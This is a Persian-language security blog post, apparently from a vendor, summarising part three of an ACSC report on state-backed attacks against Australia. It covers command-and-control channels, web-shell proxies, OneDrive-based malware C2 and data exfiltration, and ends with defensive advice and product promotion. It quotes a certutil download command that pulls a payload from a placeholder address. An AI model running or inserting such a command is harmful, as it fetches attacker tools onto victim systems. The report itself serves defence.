۱۵ تیر ۱۳۹۹
تعداد بازدید: 340
گزارش امنیتی ACSC در خصوص حملات مستمر بر ضد دولت و نهادهای استرالیا
قسمت سوم
چندی پیش نخست وزیر استرالیا اسکات موریسون اعلام کرد دولت و نهادهای این کشور به صورت مستمر هدف حملات امنیتی از سوی دولت چین قرار دارند. در همین راستا سازمان امنیت سایبری استرلیا ACSC گزارش مفصلی در ارتباط با جزئیات فنی این حملات منتشر نمود. مطالعه چنین گزارشهایی که حاصل تحقیق و بررسیهای سازمانهای معتبری مانند ACSC میباشد به تیم شبکه و امنیت سازمانها دیدگاه خوبی از حملات امنیتی خواهد داد. از این رو و به دلیل اهمیت این گزارش در سه قسمت و به زبان فارسی خلاصهای از آن را در بخش گزارشات امنیتی آرمان داده پویان تهیه کردیم.
در قسمت اول از این گزارش به بررسی این کمپین، نحوه گرفتن دسترسی مهاجمان، روشهای اجرای کد و چگونگی حفظ دسترسی بعد از نفوذ به شبکه قربانی پرداختیم. در قسمت دوم به برررسی راهکارهایی پرداختیم که مهاجمین برای شناسایی نشدن توسط راهکارهای امنیتی به کار بردهاند. همچنین روش مهاجمین در حملات اخیر استرلیا برای به دست آوردن اطلاعات احراز هویت قربانیان، نفوذ و حرکت بیشتر در شبکه هدف و در آخر نیز چونگی جمعآوری دادهها و اطلاعات را مورد بررسی قرار دادیم. در بخش پایانی چگونگی ارتباط مهاجمین با سرور فرمان و کنترل و روشهای استخراج داده مورد استفاده در این حملات مورد بررسی قرار گرفته است.
فرمان و کنترل
پروتکل لایه کاربردی استاندارد
تحقیقات ACSC نشان میدهد که استفاده از پوسته وب با ترافیک استاندارد HTTP/HTTPS اصلیترین ابزار مهاجمین برای ارتباط با سرور فرمان و کنترل میباشد. مهاجمین معمولاً از متد POST و GET برای این منظور استفاده کردهاند. ابزار مورد استفاده برای این ارتباطات در صورتی که مرورگر نباشد از طریق ابزارهای غیرمعمول python-requests/2.2.1 و CPython/2.7.2 میباشد.
پروکسی
طبق شواهد موجود، مهاجمین از پوسته وب به عنوان پروکسی SOCKS استفاده نموده تا از طریق تونل SMB یک میزبان خارجی را به میزبان داخلی در شبکه متصل نمایند.
سرویس وب
استفاده از سرویسهای تحت وب معتبر به عنوان عنصر کلیدی در ارتباط با سرور فرمان و کنترل (C&C) توسط مهاجمین شناخته میشوند. برای مثال بدافزار LibraryPSE که در یک سند Word جاسازی شده است از سرویس ابری OneDrive سربارها و دستورات اضافی را دریافت میکند. آدرس سرور فرمان و کنترل (C&C) این بدافزار https://api.onedrive.com/v1.0/shares//driveitem/content میباشد. همچنین بدافزار HTTPCore دستورات خود را از یک سرویس معتبر وب (در استرالیا) دریافت میکرد.
انتقال فایلها از راه دور
علاوه بر روش کپی فایلها از راه دور که پیشتر از آن به عنوان روشی برای حرکت در شبکه قربانی یاد شده بود، شواهدی وجود دارد که نشان میدهد مهاجمین از این روش برای سوءاستفاده از ابزار certutil.exe به منظور دانلود سایر ابزارها در سیستم قربانی استفاده میکنند. دستور زیر نمونهای از این موارد را نشان میدهد:
certutil.exe -urlcache -split -f https://192.0.2.1:443/x.php c:\x.txt
پروکسی Multi-hop
بررسیها نشان میدهد که مهاجمین به وفور از شبکه Tor برای اقداماتی از قبیل شمارش عناصر شبکه، پویش آسیبپذیریها و سایر فعالیتهای مرتبط با اکسپلویتها استفاده نمودهاند.
سایر روشهای مرتبط با سرور فرمان و کنترل
سایر روشهای شناسایی شده عبارتند از: پروتکلهای استاندارد رمزنگاری، استفاده از پورتهای رایج، رمزنگاری چندلایه و کدگذاری دادهها
نمونهبرداری
کانالهای ارتباطی سرورهای C&C
دادههای استخراج شده از سرورهای فرمان و کنترل (C&C) توسط مهاجمین شامل کانالهای ارتباطی پوستههای وب و کانالهای HTTPCore میباشند. برای شناسایی این کانالها میبایست لاگهای ذخیره شده در فایروال و پروکسی اینترنت مورد بررسی قرار گرفته و ترافیک رد و بدل شده در شبکه ذخیره و بازبینی گردند.
پروتکلهای جایگزین
طبق شواهد موجود، ارتباطاتی نیز از کانالهای غیر C&C توسط مهاجمین برقرار گردیده است که از آنها برای دانلود مستقیم فایل از اینترنت استفاده شده است.
سایر روشهای شناسایی شده
مهاجمین از روشهای دیگری مثل دادههای فشردهسازی شده و رمزگذاری شده برای استخراج دادهها از سرور فرمان و کنترل استفاده نمودهاند که بدلیل نبود جزئیات کافی به آنها پرداخته نشده است.
نتیجهگیری
در حملات اخیر که با پشتوانه دولتی و به صورت هدفمند بر ضد نهادها و سازمانهای استرلیا انجام شده است، مهاجمین برای نفوذ از آسیبپذیریهای موجود در نرم افزارها و سرویسهایی استفاده کردهاند که از طریق اینترنت قابل دسترس بودهاند. یافتن آسیبپذیریها با استفاده از پویشگرهای آسیبپذیری، انجام تست نفوذ شبکه به صورت دورهای و همچنین استفاده از راهکارهای مدیریت آسیبپذیری و نصب به موقع وصلههای امنیتی همگی در کاهش سطح آسیبپذیری در برابر چنین حملاتی بسیار موثر هستند. البته باید توجه داشته باشید تنها وجود آسیبپذیری در نرم افزارها و سیستمهایی که از طریق اینترنت قابل دسترسی هستند اهمیت ندارد بلکه آسیبپذیریهای تجهیزات، نرمافزارها و سرویسهای داخل شبکه نیز اهمیت بسیاری دارند. همانطور که در گزارش مرکز امنیت سایبری استرلیا نیز خواندید مهاجمین بعد از نفوذ برای بالا بردن سطح دسترسیشان و یا حفظ دسترسی خود از آسیبپذیریهای موجود در شبکه هدف استفاده کردند.
همچنین مهاجمین برای نفوذ از حملات فیشینگ استفاده کردهاند که در این خصوص استفاده از خدمات اختصاصی آگاهی رسانی برای کاهش خطای انسانی و جلوگیری از حملات فیشینگ موفق بسیار موثر است. در کنار این خدمات استفاده از راهکارهایی مانند KSMG توصیه میگردد.
در این حملات از روشهای مختلفی مانند مبهم سازی و یا Software packing برای مخفی ماندن از دید راهکارهای امنیتی استفاده شده است. در نتیجه راهکارهای سنتی نمیتوانند در شناسایی حملات هدفمند و پیشرفته چندان موثر باشند، بلکه استفاده از راهکارهای هوشمندی مانند کاتا کسپرسکی را به شما پیشنهاد مینماییم.
آرمان داده پویان با بهرهگیری از متخصصین امنیت و شبکه آماده ارائه خدمات طراحی و پیادهسازی طرحهای جامع امنیتی برای سازمان شما میباشد.